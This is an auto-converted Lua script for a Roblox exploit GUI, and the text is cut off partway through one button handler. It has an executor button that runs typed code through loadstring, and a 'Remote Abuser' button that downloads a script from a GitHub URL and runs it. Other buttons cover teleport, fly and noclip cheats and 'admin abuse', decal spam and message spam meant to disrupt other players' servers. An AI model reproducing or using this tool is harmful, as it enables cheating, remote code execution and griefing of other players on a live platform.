--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 51 | Scripts: 20 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.Petertiffon
G2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
G2L["1"]["Name"] = [[Petertiffon]];
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
G2L["1"]["ResetOnSpawn"] = false;


-- StarterGui.Petertiffon.ImageLabel
G2L["2"] = Instance.new("ImageLabel", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2"]["Image"] = [[rbxassetid://85750000985789]];
G2L["2"]["Size"] = UDim2.new(0, 448, 0, 507);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2"]["Position"] = UDim2.new(0.43632, 0, 0.14603, 0);


-- StarterGui.Petertiffon.ImageLabel.TextBox
G2L["3"] = Instance.new("TextBox", G2L["2"]);
G2L["3"]["TextStrokeTransparency"] = 0.8;
G2L["3"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["3"]["BorderSizePixel"] = 0;
G2L["3"]["TextWrapped"] = true;
G2L["3"]["TextStrokeColor3"] = Color3.fromRGB(0, 255, 43);
G2L["3"]["TextSize"] = 24;
G2L["3"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3"]["MultiLine"] = true;
G2L["3"]["ClearTextOnFocus"] = false;
G2L["3"]["Size"] = UDim2.new(0, 429, 0, 336);
G2L["3"]["Position"] = UDim2.new(0.02009, 0, 0.01972, 0);
G2L["3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3"]["Text"] = [[]];
G2L["3"]["BackgroundTransparency"] = 0.6;


-- StarterGui.Petertiffon.ImageLabel.TextButton
G2L["4"] = Instance.new("TextButton", G2L["2"]);
G2L["4"]["BorderSizePixel"] = 0;
G2L["4"]["TextSize"] = 34;
G2L["4"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["4"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["4"]["BackgroundTransparency"] = 0.6;
G2L["4"]["Size"] = UDim2.new(0, 211, 0, 35);
G2L["4"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["4"]["Text"] = [[EXECUTE]];
G2L["4"]["Position"] = UDim2.new(0.50446, 0, 0.70809, 0);


-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
G2L["5"] = Instance.new("LocalScript", G2L["4"]);



-- StarterGui.Petertiffon.ImageLabel.TextButton
G2L["6"] = Instance.new("TextButton", G2L["2"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["TextSize"] = 34;
G2L["6"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6"]["BackgroundTransparency"] = 0.6;
G2L["6"]["Size"] = UDim2.new(0, 211, 0, 35);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Text"] = [[CLEAR]];
G2L["6"]["Position"] = UDim2.new(0.02009, 0, 0.70809, 0);


-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
G2L["7"] = Instance.new("LocalScript", G2L["6"]);



-- StarterGui.Petertiffon.ImageLabel.TextButton
G2L["8"] = Instance.new("TextButton", G2L["2"]);
G2L["8"]["TextWrapped"] = true;
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["TextSize"] = 34;
G2L["8"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8"]["BackgroundTransparency"] = 0.6;
G2L["8"]["Size"] = UDim2.new(0, 381, 0, 27);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Text"] = [[Remote Abuser]];
G2L["8"]["Position"] = UDim2.new(0.02009, 0, 0.93688, 0);


-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
G2L["9"] = Instance.new("LocalScript", G2L["8"]);



-- StarterGui.Petertiffon.ImageLabel.ImageLabel
G2L["a"] = Instance.new("ImageLabel", G2L["2"]);
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["a"]["Image"] = [[rbxassetid://101097622034575]];
G2L["a"]["Size"] = UDim2.new(0, 444, 0, 161);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["BackgroundTransparency"] = 1;
G2L["a"]["Position"] = UDim2.new(0, 0, 0.66469, 0);


-- StarterGui.Petertiffon.ImageLabel.TextButton
G2L["b"] = Instance.new("TextButton", G2L["2"]);
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["TextSize"] = 31;
G2L["b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["b"]["BackgroundTransparency"] = 0.6;
G2L["b"]["Size"] = UDim2.new(0, 42, 0, 27);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["Text"] = [[>]];
G2L["b"]["Position"] = UDim2.new(0.88393, 0, 0.93688, 0);


-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["b"]);



-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
G2L["d"] = Instance.new("LocalScript", G2L["b"]);



-- StarterGui.Petertiffon.ImageLabel.More
G2L["e"] = Instance.new("Frame", G2L["2"]);
G2L["e"]["BorderSizePixel"] = 2;
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Size"] = UDim2.new(0, 233, 0, 581);
G2L["e"]["Position"] = UDim2.new(1, 0, 0.00197, 0);
G2L["e"]["BorderColor3"] = Color3.fromRGB(116, 255, 9);
G2L["e"]["Name"] = [[More]];


-- StarterGui.Petertiffon.ImageLabel.More.TextButton
G2L["f"] = Instance.new("TextButton", G2L["e"]);
G2L["f"]["BorderSizePixel"] = 0;
G2L["f"]["TextSize"] = 22;
G2L["f"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["f"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["f"]["BackgroundTransparency"] = 0.6;
G2L["f"]["Size"] = UDim2.new(0, 200, 0, 23);
G2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["f"]["Text"] = [[Teleport]];
G2L["f"]["Position"] = UDim2.new(0.06867, 0, 0.21637, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
G2L["10"] = Instance.new("LocalScript", G2L["f"]);



-- StarterGui.Petertiffon.ImageLabel.More.TextBox
G2L["11"] = Instance.new("TextBox", G2L["e"]);
G2L["11"]["BorderSizePixel"] = 0;
G2L["11"]["TextWrapped"] = true;
G2L["11"]["TextSize"] = 14;
G2L["11"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["11"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["11"]["ClearTextOnFocus"] = false;
G2L["11"]["PlaceholderText"] = [[== PLAYER NAME HERE ==]];
G2L["11"]["Size"] = UDim2.new(0, 200, 0, 29);
G2L["11"]["Position"] = UDim2.new(0.06438, 0, 0.14408, 0);
G2L["11"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["Text"] = [[]];
G2L["11"]["BackgroundTransparency"] = 0.6;


-- StarterGui.Petertiffon.ImageLabel.More.TextButton
G2L["12"] = Instance.new("TextButton", G2L["e"]);
G2L["12"]["BorderSizePixel"] = 0;
G2L["12"]["TextSize"] = 22;
G2L["12"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["12"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["12"]["BackgroundTransparency"] = 0.6;
G2L["12"]["Size"] = UDim2.new(0, 200, 0, 23);
G2L["12"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["12"]["Text"] = [[Toggle Fly]];
G2L["12"]["Position"] = UDim2.new(0.06867, 0, 0.32084, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
G2L["13"] = Instance.new("LocalScript", G2L["12"]);



-- StarterGui.Petertiffon.ImageLabel.More.ImageLabel
G2L["14"] = Instance.new("ImageLabel", G2L["e"]);
G2L["14"]["BorderSizePixel"] = 0;
G2L["14"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["14"]["Image"] = [[rbxassetid://137809285501059]];
G2L["14"]["Size"] = UDim2.new(0, 158, 0, 45);
G2L["14"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["14"]["BackgroundTransparency"] = 1;
G2L["14"]["Position"] = UDim2.new(0.1588, 0, 0.01786, 0);


-- StarterGui.Petertiffon.ImageLabel.More.Folder
G2L["15"] = Instance.new("Folder", G2L["e"]);



-- StarterGui.Petertiffon.ImageLabel.More.Folder.Frame
G2L["16"] = Instance.new("Frame", G2L["15"]);
G2L["16"]["BorderSizePixel"] = 0;
G2L["16"]["BackgroundColor3"] = Color3.fromRGB(0, 255, 0);
G2L["16"]["Size"] = UDim2.new(0, 233, 0, -2);
G2L["16"]["Position"] = UDim2.new(0, 0, 0.11111, 0);
G2L["16"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.Petertiffon.ImageLabel.More.Folder.Frame
G2L["17"] = Instance.new("Frame", G2L["15"]);
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(0, 255, 0);
G2L["17"]["Size"] = UDim2.new(0, 233, 0, -2);
G2L["17"]["Position"] = UDim2.new(-0.00429, 0, 0.29177, 0);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.Petertiffon.ImageLabel.More.Folder.Frame
G2L["18"] = Instance.new("Frame", G2L["15"]);
G2L["18"]["BorderSizePixel"] = 0;
G2L["18"]["BackgroundColor3"] = Color3.fromRGB(0, 255, 0);
G2L["18"]["Size"] = UDim2.new(0, 233, 0, -2);
G2L["18"]["Position"] = UDim2.new(-0.00429, 0, 0.43608, 0);
G2L["18"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.Petertiffon.ImageLabel.More.Folder.Frame
G2L["19"] = Instance.new("Frame", G2L["15"]);
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(0, 255, 0);
G2L["19"]["Size"] = UDim2.new(0, 233, 0, -2);
G2L["19"]["Position"] = UDim2.new(-0.00858, 0, 0.57854, 0);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton
G2L["1a"] = Instance.new("TextButton", G2L["e"]);
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 22;
G2L["1a"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["BackgroundTransparency"] = 0.6;
G2L["1a"]["Size"] = UDim2.new(0, 200, 0, 23);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[Toggle Noclip]];
G2L["1a"]["Position"] = UDim2.new(0.06867, 0, 0.45744, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
G2L["1b"] = Instance.new("LocalScript", G2L["1a"]);



-- StarterGui.Petertiffon.ImageLabel.More.Fstatus
G2L["1c"] = Instance.new("TextLabel", G2L["e"]);
G2L["1c"]["BorderSizePixel"] = 0;
G2L["1c"]["TextSize"] = 18;
G2L["1c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1c"]["BackgroundTransparency"] = 1;
G2L["1c"]["Size"] = UDim2.new(0, 200, 0, 9);
G2L["1c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1c"]["Text"] = [[OFF]];
G2L["1c"]["Name"] = [[Fstatus]];
G2L["1c"]["Position"] = UDim2.new(0.06867, 0, 0.38776, 0);


-- StarterGui.Petertiffon.ImageLabel.More.Fstatus.LocalScript
G2L["1d"] = Instance.new("LocalScript", G2L["1c"]);



-- StarterGui.Petertiffon.ImageLabel.More.Nstatus
G2L["1e"] = Instance.new("TextLabel", G2L["e"]);
G2L["1e"]["BorderSizePixel"] = 0;
G2L["1e"]["TextSize"] = 18;
G2L["1e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1e"]["BackgroundTransparency"] = 1;
G2L["1e"]["Size"] = UDim2.new(0, 200, 0, 9);
G2L["1e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1e"]["Text"] = [[OFF]];
G2L["1e"]["Name"] = [[Nstatus]];
G2L["1e"]["Position"] = UDim2.new(0.06438, 0, 0.52203, 0);


-- StarterGui.Petertiffon.ImageLabel.More.Nstatus.LocalScript
G2L["1f"] = Instance.new("LocalScript", G2L["1e"]);



-- StarterGui.Petertiffon.ImageLabel.More.ImageLabel
G2L["20"] = Instance.new("ImageLabel", G2L["e"]);
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["Image"] = [[rbxassetid://127996278033506]];
G2L["20"]["Size"] = UDim2.new(0, 179, 0, 96);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["BackgroundTransparency"] = 1;
G2L["20"]["Position"] = UDim2.new(0.11588, 0, 0.54956, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton
G2L["21"] = Instance.new("TextButton", G2L["e"]);
G2L["21"]["BorderSizePixel"] = 0;
G2L["21"]["TextSize"] = 22;
G2L["21"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["21"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["21"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["21"]["BackgroundTransparency"] = 0.6;
G2L["21"]["Size"] = UDim2.new(0, 200, 0, 23);
G2L["21"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["21"]["Text"] = [[Sky]];
G2L["21"]["Position"] = UDim2.new(0.06438, 0, 0.82224, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
G2L["22"] = Instance.new("LocalScript", G2L["21"]);



-- StarterGui.Petertiffon.ImageLabel.More.TextButton
G2L["23"] = Instance.new("TextButton", G2L["e"]);
G2L["23"]["BorderSizePixel"] = 0;
G2L["23"]["TextSize"] = 22;
G2L["23"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["23"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["23"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["23"]["BackgroundTransparency"] = 0.6;
G2L["23"]["Size"] = UDim2.new(0, 200, 0, 23);
G2L["23"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["23"]["Text"] = [[Decal Spam]];
G2L["23"]["Position"] = UDim2.new(0.06867, 0, 0.71204, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
G2L["24"] = Instance.new("LocalScript", G2L["23"]);



-- StarterGui.Petertiffon.ImageLabel.More.TextButton
G2L["25"] = Instance.new("TextButton", G2L["e"]);
G2L["25"]["BorderSizePixel"] = 0;
G2L["25"]["TextSize"] = 22;
G2L["25"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["25"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["25"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["25"]["BackgroundTransparency"] = 0.6;
G2L["25"]["Size"] = UDim2.new(0, 200, 0, 23);
G2L["25"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["25"]["Text"] = [[Particles]];
G2L["25"]["Position"] = UDim2.new(0.06867, 0, 0.87954, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
G2L["26"] = Instance.new("LocalScript", G2L["25"]);



-- StarterGui.Petertiffon.ImageLabel.More.TextButton
G2L["27"] = Instance.new("TextButton", G2L["e"]);
G2L["27"]["BorderSizePixel"] = 0;
G2L["27"]["TextSize"] = 22;
G2L["27"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["27"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["27"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["27"]["BackgroundTransparency"] = 0.6;
G2L["27"]["Size"] = UDim2.new(0, 200, 0, 23);
G2L["27"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["27"]["Text"] = [[Hint / Msg (HD)]];
G2L["27"]["Position"] = UDim2.new(0.06438, 0, 0.93695, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
G2L["28"] = Instance.new("LocalScript", G2L["27"]);



-- StarterGui.Petertiffon.ImageLabel.More.TextButton
G2L["29"] = Instance.new("TextButton", G2L["e"]);
G2L["29"]["BorderSizePixel"] = 0;
G2L["29"]["TextSize"] = 22;
G2L["29"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["29"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["29"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["29"]["BackgroundTransparency"] = 0.6;
G2L["29"]["Size"] = UDim2.new(0, 200, 0, 23);
G2L["29"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["29"]["Text"] = [[Music]];
G2L["29"]["Position"] = UDim2.new(0.06867, 0, 0.76483, 0);


-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
G2L["2a"] = Instance.new("LocalScript", G2L["29"]);



-- StarterGui.Petertiffon.ImageLabel.LocalScript
G2L["2b"] = Instance.new("LocalScript", G2L["2"]);



-- StarterGui.Petertiffon.ImageLabel.TextLabel
G2L["2c"] = Instance.new("TextLabel", G2L["2"]);
G2L["2c"]["TextStrokeTransparency"] = 0.73;
G2L["2c"]["BorderSizePixel"] = 0;
G2L["2c"]["TextSize"] = 18;
G2L["2c"]["TextStrokeColor3"] = Color3.fromRGB(59, 255, 15);
G2L["2c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2c"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2c"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2c"]["BackgroundTransparency"] = 1;
G2L["2c"]["Size"] = UDim2.new(0, 170, 0, 29);
G2L["2c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2c"]["Text"] = [[VER]];
G2L["2c"]["Position"] = UDim2.new(0, 0, 1, 0);


-- StarterGui.Petertiffon.ImageLabel.TextLabel.LocalScript
G2L["2d"] = Instance.new("LocalScript", G2L["2c"]);



-- StarterGui.Petertiffon.ImageLabel.TextLabel.LocalScript.Value
G2L["2e"] = Instance.new("StringValue", G2L["2d"]);
G2L["2e"]["Value"] = [[1.8]];


-- StarterGui.Petertiffon.ImageLabel.LocalScript
G2L["2f"] = Instance.new("LocalScript", G2L["2"]);



-- StarterGui.Petertiffon.ImageLabel.TextButton
G2L["30"] = Instance.new("TextButton", G2L["2"]);
G2L["30"]["TextWrapped"] = true;
G2L["30"]["BorderSizePixel"] = 0;
G2L["30"]["TextSize"] = 34;
G2L["30"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
G2L["30"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["30"]["FontFace"] = Font.new([[rbxasset://fonts/families/Merriweather.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["30"]["BackgroundTransparency"] = 0.6;
G2L["30"]["Size"] = UDim2.new(0, 427, 0, 27);
G2L["30"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["30"]["Text"] = [[Obama Admin Abuse]];
G2L["30"]["Position"] = UDim2.new(0.02009, 0, 0.86982, 0);


-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
G2L["31"] = Instance.new("LocalScript", G2L["30"]);



-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
G2L["32"] = Instance.new("LocalScript", G2L["30"]);



-- StarterGui.Petertiffon.ImageLabel.TextButton.TextLabel
G2L["33"] = Instance.new("TextLabel", G2L["30"]);
G2L["33"]["TextWrapped"] = true;
G2L["33"]["TextStrokeTransparency"] = 0.78;
G2L["33"]["BorderSizePixel"] = 0;
G2L["33"]["TextSize"] = 17;
G2L["33"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["33"]["TextStrokeColor3"] = Color3.fromRGB(255, 0, 0);
G2L["33"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["33"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["33"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
G2L["33"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["33"]["BackgroundTransparency"] = 1;
G2L["33"]["Size"] = UDim2.new(0, 214, 0, 141);
G2L["33"]["Visible"] = false;
G2L["33"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["33"]["Text"] = [[WARNING!
This option was made for particular events in replicated storage, dont use in any game except for  "🔥 WORM TROLL TOWER! [FUNK]"]];
G2L["33"]["Position"] = UDim2.new(-0.52225, 0, 0, 0);


-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
local function C_5()
local script = G2L["5"];
	local button = script.Parent
	local textbox = button.Parent.TextBox
	
	button.MouseButton1Click:Connect(function()
		local code = textbox.Text
		if code and code ~= "" then
			local func = loadstring(code)
			if func then
				task.spawn(func)
			end
		end
	end)
	
end;
task.spawn(C_5);
-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
local function C_7()
local script = G2L["7"];
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.TextBox.Text=""
	end)
end;
task.spawn(C_7);
-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
local function C_9()
local script = G2L["9"];
	script.Parent.MouseButton1Click:Connect(function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/naoBkkk/R.E./refs/heads/main/F"))()
	end)
end;
task.spawn(C_9);
-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
local function C_c()
local script = G2L["c"];
	script.Parent.MouseButton1Click:Connect(function()
		if script.Parent.Parent.More.Visible==true then
			script.Parent.Parent.More.Visible=false
		else
			script.Parent.Parent.More.Visible=true
		end
	end)
end;
task.spawn(C_c);
-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
local function C_d()
local script = G2L["d"];
	while true do
		if script.Parent.Parent.More.Visible==true then
			script.Parent.Text="<"
		else
			script.Parent.Text=">"
		end
		
		wait(0.1)
	end
end;
task.spawn(C_d);
-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
local function C_10()
local script = G2L["10"];
	s=script.Parent.Parent.TextBox
	script.Parent.MouseButton1Click:Connect(function()
		local plr = game.Players.LocalPlayer
		local hrp = plr.Character:WaitForChild("HumanoidRootPart")
		local n = s.Text
		for _, p in pairs(game.Players:GetPlayers()) do
			if p.Name:lower():find(n:lower()) and p.Character and p.Character:FindFirstChild("HumanoidRootPart") then
				hrp.CFrame = p.Character.HumanoidRootPart.CFrame + Vector3.new(0,3,0)
				break
			end
		end
	end)
end;
task.spawn(C_10);
-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
local function C_13()
local script = G2L["13"];
	local plr = game.Players.LocalPlayer
	local char = plr.Character or plr.CharacterAdded:Wait()
	local hum = char:WaitForChild("Humanoid")
	local hrp = char:WaitForChild("HumanoidRootPart")
	local status = script.Parent.Parent.Fstatus
	
	local flying = false
	local speed = 60
	local keys = {W=false,A=false,S=false,D=false}
	
	local UIS = game:GetService("UserInputService")
	local RS = game:GetService("RunService")
	
	local button = script.Parent
	
	local function startFly()
		flying = true
		hum.PlatformStand = true
		local bv = Instance.new("BodyVelocity", hrp)
		bv.MaxForce = Vector3.new(1e9,1e9,1e9)
		bv.Velocity = Vector3.zero
		status.Text="ON"
	
		RS.RenderStepped:Connect(function()
			if flying then
				local cam = workspace.CurrentCamera.CFrame
				local move = Vector3.zero
				if keys.W then move += cam.LookVector end
				if keys.S then move -= cam.LookVector end
				if keys.A then move -= cam.RightVector end
				if keys.D then move += cam.RightVector end
				bv.Velocity = move * speed
			end
		end)
	end
	
	local function stopFly()
		flying = false
		status.Text="OFF"
		hum.PlatformStand = false
		if hrp:FindFirstChild("BodyVelocity") then
			hrp.BodyVelocity:Destroy()
		end
	end
	
	button.MouseButton1Click:Connect(function()
		if flying then stopFly() else startFly() end
	end)
	
	UIS.InputBegan:Connect(function(i) if keys[i.KeyCode.Name] ~= nil then keys[i.KeyCode.Name] = true end end)
	UIS.InputEnded:Connect(function(i) if keys[i.KeyCode.Name] ~= nil then keys[i.KeyCode.Name] = false end end)
	
end;
task.spawn(C_13);
-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
local function C_1b()
local script = G2L["1b"];
	local btn = script.Parent
	local plr = game.Players.LocalPlayer
	local char = plr.Character or plr.CharacterAdded:Wait()
	local status = script.Parent.Parent.Nstatus
	
	local noclip = false
	local RS = game:GetService("RunService")
	
	btn.MouseButton1Click:Connect(function()
		noclip = not noclip
		status.Text = noclip and "ON" or "OFF"
	end)
	
	RS.RenderStepped:Connect(function()
		if noclip and char then
			for _, part in ipairs(char:GetDescendants()) do
				if part:IsA("BasePart") then
					part.CanCollide = false
				end
			end
		else
			for _, part in ipairs(char:GetDescendants()) do
				if part:IsA("BasePart") then
					part.CanCollide = true
				end
			end
		end
	end)
	
end;
task.spawn(C_1b);
-- StarterGui.Petertiffon.ImageLabel.More.Fstatus.LocalScript
local function C_1d()
local script = G2L["1d"];
	while true do 
		if script.Parent.Text=="OFF" then
			script.Parent.TextColor=Color3.new(1, 0, 0)
		end
		wait()
	end
	
	while true do 
		if script.Parent.Text=="ON" then
			script.Parent.TextColor=Color3.new(0.0156863, 1, 0)
		end
		wait()
	end
end;
task.spawn(C_1d);
-- StarterGui.Petertiffon.ImageLabel.More.Nstatus.LocalScript
local function C_1f()
local script = G2L["1f"];
	while true do 
		if script.Parent.Text=="OFF" then
			script.Parent.TextColor=Color3.new(1, 0, 0)
		end
		wait()
	end
	
	while true do 
		if script.Parent.Text=="ON" then
			script.Parent.TextColor=Color3.new(0.0156863, 1, 0)
		end
		wait()
	end
end;
task.spawn(C_1f);
-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
local function C_22()
local script = G2L["22"];
	script.Parent.MouseButton1Click:Connect(function()
		local player = game.Players.LocalPlayer
		local char = player.Character
